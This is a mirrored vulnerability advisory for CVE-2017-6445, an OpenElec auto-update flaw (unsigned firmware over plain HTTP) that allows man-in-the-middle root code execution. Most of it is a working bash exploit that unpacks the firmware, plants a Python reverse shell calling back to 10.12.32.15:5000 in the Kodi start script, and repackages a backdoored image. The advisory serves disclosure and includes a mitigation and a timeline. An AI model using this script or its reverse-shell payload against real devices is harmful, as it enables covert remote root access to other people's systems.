首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenElec 6.0.3 / 7.0.1 Code Execution
来源:https://tech.feedyourhead.at 作者:Hotwagner 发布时间:2017-03-07  
During my research about update mechanisms of open-source software I
discovered vulnerabilities in OpenElec.

== [ OVERVIEW ] ==

    System affected: OpenElec
    CVE: CVE-2017-6445
    Vulnerable component: auto-update feature
    Software-Version: 6.0.3, 7.0.1
    User-Interaction: Reboot required
    Impact: Remote Code Execution with root permission

== [ PRODUCT DESCRIPTION ] ==

According to its website "Open Embedded Linux Entertainment Center
(OpenELEC) is a small Linux based Just Enough Operating System (JeOS)
built from scratch as a platform to turn your computer into a Kodi media
center."

== [ VULNERABILITY ] ==

Automatic updates are disabled by default. After enabling it, OpenElec
connects to http://update.openelec.tv/updates.php to find out if there
is an update for a newer version. If there is a newer version, openelec
will download it from http://releases.openelec.tv/<version>.tar(or any
other url returned by update.openelec.tv).

The auto-update feature of OpenElec does neither use encrypted
connections nor does it use signed updates. A Man-In-The-Middle could
manipulate the update-packages to gain root-access remotely.
In order to run the downloaded firmware, the OpenElec-system has to be
rebooted. So at this point user-interaction is required.

== [ EXPLOIT ] ==

The following code downloads an openelec-firmware, extracts it, places a
reverse-shell into the kodi-startscript and finally generates a
backdoored firmware:

#!/bin/bash
 OPENELEC="OpenELEC-RPi2.arm-7.0.1"
DOWNLOADURL="http://releases.openelec.tv/"
 TMP="/tmp"

cd $TMP
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar
test -d $OPENELEC || tar xvf ${OPENELEC}.tar
 test -d $TMP/unpacked || mkdir $TMP/unpacked

cd $TMP/unpacked

test -d $TMP/unpacked/squashfs-root || unsquashfs
$TMP/$OPENELEC/target/SYSTEM

cat > $TMP/unpacked/squashfs-root/usr/bin/revshell.sh << EOF

#!/bin/bash
 while true
do
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /dev/null 2>&1
done
EOF

chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh

awk '/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &"; next
}1' $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh >
$TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh

mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh

$TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh

chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh
mksquashfs squashfs-root/ SYS -noappend -comp gzip
mv SYS $TMP/$OPENELEC/target/SYSTEM
cd $TMP/$OPENELEC
md5sum target/SYSTEM > target/SYSTEM.md5
cd $TMP
tar cvf $OPENELEC.evil.tar $OPENELEC

test -d $TMP/unpacked && rm -fr $TMP/unpacked
test -d $OPENELEC && rm -rf $OPENELEC

== [ MITIGATION ] ==

Ensure that auto-update is disabled.

== [ Timeline ] ==

   * This bug was reported on December 03 2016.
   * Published as Zero-Day after no reply from OpenElec on March 04 2017

== [ CREDITS ] ==

CVE-2017-6445 was discovered by Wolfgang Hotwagner
(https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Deluge Web UI 1.3.13 - Cross-S
·Alienvault OSSIM / USM 5.3.0 A
·WordPress Multiple Plugins - A
·Struts2 S2-045 Remote Command
·CyberGhost 6.0.4.2205 - Privil
·Azure Data Expert Ultimate 2.2
·Conext ComBox 865-1058 - Denia
·Evostream Media Server 1.7.1 (
·FTPShell Client 6.53 - Buffer
·USBPcap - Privilege Escalation
·Ektron 8.5 / 8.7 / 9.0 XSLT Tr
·Drupal 7.x Module Services - R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved